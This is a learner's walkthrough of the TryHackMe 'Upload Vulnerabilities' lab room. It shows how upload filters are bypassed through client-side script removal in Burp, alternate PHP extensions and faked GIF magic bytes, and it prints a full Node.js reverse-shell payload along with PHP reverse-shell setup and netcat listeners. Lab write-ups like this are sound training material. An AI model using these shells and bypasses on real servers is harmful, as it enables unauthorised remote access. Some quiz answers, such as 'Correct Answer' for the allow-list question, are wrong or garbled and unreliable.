Upload Vulnerabilities on Tryhackme

This is the write up for the room Upload Vulnerabilities on Tryhackme and it is part of the Web Fundamentals Path

Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment

TASKS Upload Vulnerabilities

Task 1

Follow along this task. It is self-explanatory. This is very important otherwise you will not be able to clear the rest of this room

It is only one command you need to enter in the terminal

echo "<MACHINE_IP>    overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm" | sudo tee -a /etc/hosts

to revert

sudo sed -i '$d' /etc/hosts

Task 2

Read all that is in this task and press complete

Task 3

Read all that is in this task and press complete

Task 4

Read all that is in this task

4.1 What is the name of the image file which can be overwritten?

Open the website http://overwrite.uploadvulns.thm/

Right click and view image info

4.2 Overwrite the image. What is the flag you receive?

Now upload a files called mountains.jpg

Task 5

Read all that is in the task

Navigate to shell.uploadvulns.thm and complete the questions for this task.

5.1 Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads? (N.B. This is a good habit to get into, and will serve you well in the upcoming tasks…)

First we run gobuster by typing in

gobuster -u http://shell.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Type in the command and do not copy it. Sometime this will give errors

Now upload a files so we can see where it is added ( select the file then press upload ). I have uploaded mountains.jpg

And we see it in resources

5.2 Get either a web shell or a reverse shell on the machine.
What’s the flag in the /var/www/ directory of the server?

Let’s go for a reverse shell.

first we need to copy the correct shell to use. It come with KALI

Type in the following command to copy the webshell.php so we can edit it and leave the source as it is

cp /usr/share/webshells/php/php-reverse-shell.php ~/Downloads/shell.php
cd ~/Downloads/
nano shell.php

Now change the ip to you tun0 IP

We leave the port as is. now press control+x to exit and save

Start a listner by typing in the following command

nc -nlvp 1234

Now upload the shell.php and check the resources page

Now click on this and go back to the terminal where we have started the listner

and we have a shel

now type in

cd /var/www
ls
cat flag.txt

Task 6

Read all that is in the task.

6.1 What is the traditional server-side scripting language?

Answer: php

6.2 When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?

Answer: Correct Answer

6.3 [Research] What MIME type would you expect to see when uploading a CSV file?

You can guess this one. a cvs file is always a txt file. As multiple system can read it

Answer text/csv

Task 7

Read all that is in the task

7.1 What is the flag in /var/www/?

If you want to scan with gobuster you can by typing in the following command

gobuster -u http://java.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This will reveal the image and assets directory

We will use the webshell.php in previous task

Start up Burpsuite and put intercept on. Followi this guide if you do not know how to configure Firefox with Burp Configure Burpsuite with Firefox

Now navigate to the page http://java.uploadvulns.thm/

You will se this

Right click and Do intercept -> response to this request

Then press Forward

Now delete the client side filter and press forward

Now go back to the site and upload the webshell.php

Once you see the webshell in burp you can turn off burp or press Forward until you see an succefull upload

Now start up a listner in a terminal by typing

nc -nlvp 1234

Now go to the image directory we have found and click on the shell.php

http://java.uploadvulns.thm/images/

cat /var/www/flag.txt

Task 8

Read all that is in the task

8.1 What is the flag in /var/www/?

Firt we do a gobuster by typing in

gobuster -u http://annex.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We find

Use the command select to selct a file and then type upload to upload the file. As we notice webshell.php is invalid so we open up the givne wiki page and fin dall the php extensions we can try

Bij renaming the webshell.php th webshell.php5 and then upload it we have a succes

It laso changes the name. Now start up a lisner with the following command

nc – nlvp 1234

Click on the php5 file in the privacy directory and notice the shell

cat out the flag by tiping

cat /var/www/flag.txt

Task 9

9.1 Grab the flag from /var/www/

First we do a dirbuster scan by typing in the following command

gobuster -u http://magic.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The graphics directory is fobidden

Now we try to upload the shell.php file and we see an error

So it wants an gif file. Let’s see if we can do the maic number hack here

first make a copy of the shell.php just in case we need to revert

I will copy and rename the file to magic.php by typing in the followin gcommand

cp shell.php magic.php

Here we can find the list of signatures List of file signatures – Wikipedia

for gif it is

So there are 2.

47 49 46 38 37 61
47 49 46 38 39 61

The number is 6 bytes long. Add AAAAAA to the magic.php file

nano magic.php

Save the file then open it in hexeditor by typing

hexeditor magic.php

Now change the bytes to what we have found

Now upload this file

Start a listner by typing in

nc -nlvp 1234

Indexing is off on the server so we need to type in the the following

http://magic.uploadvulns.thm/graphics/magic.php

cat /var/www/flag.txt

Task 10

Read all that is in the task and press complete

Task 11

11. Hack the machine and grab the flag from /var/www/

Ok now for the fun part

Run gobuster first

Now go to the site jewel.uploadvulns.thm

Let’s try to upload a file and It is telling me it want an jpg file

Looking at the source we see upload.js and clicking on it revels the filters for the client side

Let’s try to bypass this client filter and it will probably also be on the server side, However first let us analyse the webpage

It is node.js . This means the reverse shell we used probably does not work.

At this page we will find a payload we can use

PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings · GitHub

Payload

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(443, "10.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

Save this file as shell.js and adjust the setting in the payload to your IP and use port number 443

Now we need to bypass in order to upload. To do this we need to deactivate the client filter first. Looking at the source we see an upload.js that holds the filters as we have seen.

Startup Burpsuite and turn on intercept

Reload the page by pressing control+F5 so it will flush out the cashed upload.js

In burpsuite forward until you find upload.js

If you do not get this screen then go to options and turn of file extension under intecept client requests

Now click forward until you see this java script

Delete the highted functions and press foward

When uploading the file we still get invalid format. change the name of the file to shell.jpg and try again.

Now we need to find where the file is stored so we can run it

With dirbuster we have found an admin page. navigating to this admin page reveals

This is probably where we need to activate from. It also tels us a module directory

Download the attached given file and use this with dirbuster to scan the found directories

Im sure our file is here. So let’s upload the file again and the run dirbuster again

Now we know where a file is. Now we need to find a way to execute it

First start a listener on port 443 by typing in a terminal

nc -nlvp 443

Going back to the admin page and enter the file name AZC.jpg

Opening burp and intercept the request

Go to the admin page again and now we will go up a directory and in the content directory

Go back to the terminal where the listner started

cat the flag with the command

cat /var/www/flag.txt

Now we have completed this challenge and the room Upload Vulnerabilities. I must admin I did take a look at the hints. I was more stuck on Burp suite to get the upload.js in order to bypass it. Clear out the Firefox cache an turn off the file extensions in burp did the trick.